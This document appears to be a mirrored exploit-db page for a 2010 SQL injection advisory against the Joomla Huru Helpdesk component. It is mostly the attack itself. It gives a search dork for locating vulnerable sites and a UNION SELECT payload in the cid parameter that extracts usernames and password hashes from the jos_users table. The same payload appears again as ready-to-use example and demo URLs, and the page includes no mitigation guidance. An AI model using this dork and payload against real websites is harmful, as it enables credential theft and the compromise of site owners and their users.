Joomla! Component Huru Helpdesk – SQL Injection (2)

  • 作者: Amine_92
    日期: 2010-07-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14449/
  • ====================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
===================================================

Author : Amine_92
Email: [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK:inurl:"index.php?option=com_huruhelpdesk"
===================================================

[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]

[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

====================================================
Thank's to :awras,italiano_capilo & all my friends
    Python